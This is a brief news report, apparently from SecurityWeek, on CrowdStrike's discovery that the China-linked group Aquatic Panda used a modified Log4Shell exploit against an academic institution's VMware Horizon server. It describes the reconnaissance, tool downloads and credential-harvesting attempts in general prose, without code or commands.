"Chinese Spies Exploit Log4Shell to Hack Major Academic Institution"

CrowdStrike's Falcon OverWatch team has discovered that China-linked cyberespionage group Aquatic Panda exploited the Log4Shell vulnerability to compromise a large academic institution.  As part of a recent campaign, the OverWatch security researchers observed Aquatic Panda leveraging a modified version of the Log4j exploit for initial access and then performing various post-exploitation operations, including reconnaissance and credential harvesting. The researchers stated that in their attempt to compromise the unnamed academic institution, the attackers targeted a VMware Horizon instance that employed the vulnerable Log4j library. The attackers performed connectivity checks via DNS lookups for a subdomain running on the VMware Horizon instance under the Apache Tomcat service. Next, Aquatic Panda executed multiple Linux commands on a Windows host on which the Apache Tomcat service was running, including some aimed at deploying attacker tools hosted on remote infrastructure. The adversaries performed reconnaissance from the host, seeking to better understand privilege levels and domain details, and also attempted to stop a third-party endpoint detection and response solution. After deploying additional scripts, the hackers attempted to execute PowerShell commands to retrieve malware and three VBS files believed to constitute a reverse shell. Aquatic Panda also made several attempts at credential harvesting by performing memory dumps and preparing them for exfiltration by compressing them. The researchers stated that the target organization was alerted to the suspicious activity immediately after detection and quickly implemented their incident response protocol to patch the vulnerable software and prevent further malicious activity.

SecurityWeek reports: "Chinese Spies Exploit Log4Shell to Hack Major Academic Institution"